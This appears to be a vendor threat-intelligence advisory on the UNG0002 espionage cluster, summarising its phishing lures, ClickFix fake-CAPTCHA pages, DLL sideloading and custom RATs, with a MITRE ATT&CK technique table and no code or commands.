EXECUTIVE SUMMARY:
An espionage-focused threat cluster, designated UNG0002, has been observed conducting targeted cyber campaigns across multiple Asian jurisdictions, including China, Hong Kong, and Pakistan. This threat actor consistently targets a broad range of sectors such as defense, electrotechnical engineering, civil aviation, gaming, software development, academia, and medical institutions. UNG0002 employs sophisticated social engineering techniques, including the use of realistic decoy documents and fake CAPTCHA verification pages, to lure victims and facilitate payload execution. The group exhibits a high degree of operational security and persistence, maintaining a long-running presence with evolving tactics.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
An espionage-focused threat cluster, designated UNG0002, has been observed conducting targeted cyber campaigns across multiple Asian jurisdictions, including China, Hong Kong, and Pakistan. This threat actor consistently targets a broad range of sectors such as defense, electrotechnical engineering, civil aviation, gaming, software development, academia, and medical institutions. UNG0002 employs sophisticated social engineering techniques, including the use of realistic decoy documents and fake CAPTCHA verification pages, to lure victims and facilitate payload execution. The group exhibits a high degree of operational security and persistence, maintaining a long-running presence with evolving tactics.[emaillocker id="1283"]
UNG0002 leverages complex infection chains that rely heavily on malicious shortcut (LNK) files, VBScript, batch scripts, and PowerShell to deploy custom remote access trojans (RATs) such as Shadow RAT, INET RAT, and Blister DLL implants. The actor abuses DLL sideloading by exploiting legitimate Windows applications like Rasphone and Node-Webkit binaries to stealthily execute malicious payloads. Their social engineering campaigns include spoofing official government websites, notably mimicking Pakistans Ministry of Maritime Affairs, to trick victims into running malicious PowerShell scripts through fake CAPTCHA verification pages known as the ClickFix technique. The group also uses highly targeted decoys, including fake resumes and profiles designed to appeal to game UI designers and computer science students from prestigious institutions. The command-and-control infrastructure shows consistent naming patterns, reflecting disciplined operational security across campaigns. Notably, PDB paths within malware samples hint at internal code names such as Mustang and ShockWave, indicating potential mimicry of established threat actor toolsets like Cobalt Strike and Metasploit.
UNG0002 represents a capable and adaptive threat actor with a long-term focus on cyber-espionage. Their operations reflect a mature understanding of both technical exploitation and human-centric attack vectors. The group maintains a persistent targeting strategy, backed by evolving malware toolsets and evasive techniques. With a clear emphasis on sensitive sectors and a proven ability to adapt and mimic other threat groups methodologies, UNG0002 poses a sustained risk to organizations across the region. Ongoing monitoring and in-depth threat intelligence analysis remain essential to counter this evolving cluster.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Reconnaissance | T1598.002 | Phishing for Information | Spearphishing Attachment |
| Resource Development | T1587.001 | Develop Capabilities | Malware |
| T1583.001 | Acquire Infrastructure | Domains | |
| T1583.006 | Web Services | ||
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| T1189 | Drive-by Compromise | ||
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Defense Evasion | T1027.002 | Obfuscated Files or Information | Software Packing |
| T1202 | Indirect Command Execution | ||
| Credential Access | T1056.001 | Input Capture | Keylogging |
| Discovery | T1082 | System Information Discovery | |
| Collection | T1005 | Data from Local System | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1105 | Ingress Tool Transfer | ||
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
REFERENCES:
The following reports contain further technical details:
[/emaillocker]